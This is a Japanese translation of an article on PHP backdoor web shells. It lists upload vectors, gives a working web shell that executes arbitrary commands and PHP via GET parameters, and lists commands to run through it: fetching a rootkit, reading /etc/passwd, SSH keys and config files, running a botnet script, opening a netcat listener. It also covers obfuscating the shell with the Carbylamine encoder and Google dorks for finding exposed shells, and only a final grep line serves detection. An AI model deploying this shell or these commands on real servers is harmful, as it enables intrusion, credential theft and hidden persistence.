バックドアの検索

4364 ワード

原文住所:http://resources.infosecinstitute.com/checking-out-backdoor-shells/
Web shellをアップロードする方法
1.ローカルファイルに脆弱性が含まれている-攻撃者はフォルダを介してプロパティを巡回することができる
2.リモートコマンド実行またはコマンド注入-Webサイトが追加の文字列を受信した場合、入力した文字列はWebサーバ上でコマンドを実行するパラメータとして使用されます.
3.SQLi-攻撃者アクティブウェブ管理者のusername/password後、管理権限を使用して管理パネルにアクセスし、バックドアをアップロードできます.
4. sniff
5.暴力解読-暴力解読FTP/SSHによるアクセス
6.クロスステーションスクリプト
7.社会工学
8.リモートファイルに含まれる
PHPバックドアについて説明します.
次のコードは、攻撃者実行*nixコマンドを実行します.
<?php
 
   if(isset($_GET['shell'])) echo("<pre>".shell_exec($_GET['shell']." &")."</pre>");
 
   if(isset($_GET['php'])) echo(eval(stripcslashes($_GET['php'])));
 
   if(isset($_GET['echo'])) echo($_GET['echo']);
 
?>

保存コードはbb.php、webサーバにアップロードします.末尾に追加する必要がありますか?shell=は、次のようなコマンドを実行します.
uname -a
cat /etc/issue
wget www.whateversite.com/rootkit.pl
cat /etc/passwd
cat /var/www/config.inc
find / -name netcat
ifconfig | grep eth0
perl botnet.pl
ls -la
ps aux | grep root
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat /proc/self/environ
find / -perm -1000 -type d 2>/dev/null
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
perl -v
python -v
ruby -v
gcc -v
nc -lvp 1337

[译]查找后门shell_第1张图片
[译]查找后门shell_第2张图片
現在、開発者はバックドアshellに多くの特性を追加しています.例えば、r 57、c 99、およびAni-Shellバックドア.一部のバックドアにはメールボックスbombers、リターン、ファイルアップロード/ダウンロード、mysql dumper、sql文の実行、web fuzzer、ポートスキャンなどがあります.
[译]查找后门shell_第3张图片
[译]查找后门shell_第4张图片
保護されていないバックドアはGoogle dorkで簡単に見つけることができます:inurl:r 57.php, intitle: MagicCoder | Version X70.01, inurl:c99.php, inurl:r00t.php, inurl:mma.phpなど.
いくつかのバックドアは、PHPエンコーダを使用している攻撃者がいることを発見することができます.新しいPHPエンコーダはCarbylamineと呼ばれ、C 99とr 57が簡単に発見されないようにすることができます.Carbylamineは簡単です.
php carbylamine.php
例えば、bbを符号化する.php、encodeと命名する.php:
php carbylamine.php bb.php encoded.php

[译]查找后门shell_第5张图片
encoded.phpのサンプル:
<?php function KJnPCP($XZK)
{
$XZK=gzinflate(base64_decode($XZK));
 for($i=0;$i<strlen($XZK);$i++)
 {
$XZK[$i] = chr(ord($XZK[$i])-1);
 }
 return $XZK;
 }eval(KJnPCP("U1QEAm4gzkrXzCopSSvVVE3wcAuN0SjJTMvN1YjT0lJMS8ks0FS2LSxOs1fWBwsnpFWmpaAp1FdWVFfW0le2NQAr1LLBZmhhZiHCyLTypFzNktLirMKUktwkoDElaMqwmwHSizAEVdCG28GeGwA="));
?>

バックドアの検索/削除
[color=blue]grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval) *(" /var/www[/color]